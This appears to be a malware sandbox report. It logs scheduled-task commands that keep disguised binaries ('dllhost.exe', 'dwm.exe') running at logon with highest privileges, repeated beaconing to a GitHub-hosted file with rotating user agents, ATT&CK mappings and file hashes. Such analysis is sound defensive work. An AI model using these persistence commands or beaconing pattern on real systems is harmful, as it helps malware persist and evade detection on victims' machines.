schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3984

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Windows\Offline Web Pages\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Users\Default\AppData\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default\AppData\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Users\Default\AppData\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4320

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

228.249.119.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

228.249.119.40.in-addr.arpa

IN PTR

Response
DNS

172.214.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.214.232.199.in-addr.arpa

IN PTR

Response
DNS

68.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

68.32.126.40.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

dllhost.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.109.133
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:12:25 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600040-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734829945.416614,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: d660f5f573e35ef5dfd9e339d1befde5b354ff8d
Expires: Sun, 22 Dec 2024 01:17:25 GMT
Source-Age: 181
DNS

133.110.199.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.110.199.185.in-addr.arpa

IN PTR

Response

133.110.199.185.in-addr.arpa

IN PTR

cdn-185-199-110-133githubcom
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:12:38 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600057-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734829959.557012,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 13a7c2408f4cafd5e5ba6b28149179dca4472a71
Expires: Sun, 22 Dec 2024 01:17:38 GMT
Source-Age: 195
DNS

58.55.71.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.55.71.13.in-addr.arpa

IN PTR

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:12:52 GMT
Via: 1.1 varnish
X-Served-By: cache-lon420088-LON
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1734829972.360639,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 8511bb3c21ec6d0021d3036935c364ea8d8bfb06
Expires: Sun, 22 Dec 2024 01:17:52 GMT
Source-Age: 191
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:00 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600039-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734829980.001445,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: b9af19ce2317cfdc0332ed3b9e5e0fa0a15f2f8d
Expires: Sun, 22 Dec 2024 01:18:00 GMT
Source-Age: 216
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:10 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600045-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734829991.810058,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: ff6d54934db323d68a1ebd50be3c799c76fcbca6
Expires: Sun, 22 Dec 2024 01:18:10 GMT
Source-Age: 227
DNS

81.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.144.22.2.in-addr.arpa

IN PTR

Response

81.144.22.2.in-addr.arpa

IN PTR

a2-22-144-81deploystaticakamaitechnologiescom
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:25 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600069-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830006.779229,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 33c6a4d8340b52548e60d6c707a5355ea63f3ea5
Expires: Sun, 22 Dec 2024 01:18:25 GMT
Source-Age: 242
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:35 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600025-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830015.264410,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 0d1aafb7e3dc3e17758cf22fae420ebe485bbb7c
Expires: Sun, 22 Dec 2024 01:18:35 GMT
Source-Age: 251
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:46 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600076-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830026.234710,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 01a8dd6e22a69eeefaddf6d81d497aca257ad8f4
Expires: Sun, 22 Dec 2024 01:18:46 GMT
Source-Age: 262
DNS

73.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.144.22.2.in-addr.arpa

IN PTR

Response

73.144.22.2.in-addr.arpa

IN PTR

a2-22-144-73deploystaticakamaitechnologiescom
DNS

31.243.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

31.243.111.52.in-addr.arpa

IN PTR

Response
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:13:58 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600082-LCY
X-Cache: HIT
X-Cache-Hits: 2
X-Timer: S1734830038.030273,VS0,VE0
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 1510236ec625064791f378e12294b1be1feeec04
Expires: Sun, 22 Dec 2024 01:18:58 GMT
Source-Age: 274
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:14:05 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600046-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830045.245569,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: a9920d1e0e755804a1bd800a0550c25af7f95c94
Expires: Sun, 22 Dec 2024 01:19:05 GMT
Source-Age: 281
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:14:14 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600072-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830054.270341,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 31659ce2f5c575e130a0b9ebeb3116b7ec1cead3
Expires: Sun, 22 Dec 2024 01:19:14 GMT
Source-Age: 290
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:14:24 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600022-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830064.344905,VS0,VE124
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 08416a30235babc3104140473316ce4ca9432ef7
Expires: Sun, 22 Dec 2024 01:19:24 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:14:32 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600042-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830073.835198,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 06fa27d2d9013604f3f2b8ac8a0fa365673ac335
Expires: Sun, 22 Dec 2024 01:19:32 GMT
Source-Age: 8
GET

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

dllhost.exe

Remote address:

185.199.110.133:443

Request

GET /justbio123/raven/main/api.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 4
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: text/plain; charset=utf-8
ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: DA94:39D8B8:441DE8:596B25:6766E7B4
Accept-Ranges: bytes
Date: Sun, 22 Dec 2024 01:14:41 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4237-LON
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1734830082.507011,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: fd51b43c9bb56be4d56eb8414c44b5d8423ae68f
Expires: Sun, 22 Dec 2024 01:19:41 GMT
Source-Age: 300

185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

897 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

914 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

897 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

897 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

896 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

861 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

914 B
5.1kB
8
10

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

861 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200
185.199.110.133:443

https://raw.githubusercontent.com/justbio123/raven/main/api.txt

tls, http

dllhost.exe

896 B
5.1kB
8
9

HTTP Request

GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

68.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

68.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

raw.githubusercontent.com

dns

dllhost.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.108.133

185.199.111.133

185.199.109.133
8.8.8.8:53

133.110.199.185.in-addr.arpa

dns

74 B
118 B
1
1

DNS Request

133.110.199.185.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

18.31.95.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

18.31.95.13.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

81.144.22.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

81.144.22.2.in-addr.arpa
8.8.8.8:53

73.144.22.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

73.144.22.2.in-addr.arpa
8.8.8.8:53

31.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

31.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

Filesize
1KB

MD5
baf55b95da4a601229647f25dad12878

SHA1
abc16954ebfd213733c4493fc1910164d825cac8

SHA256
ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

SHA512
24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

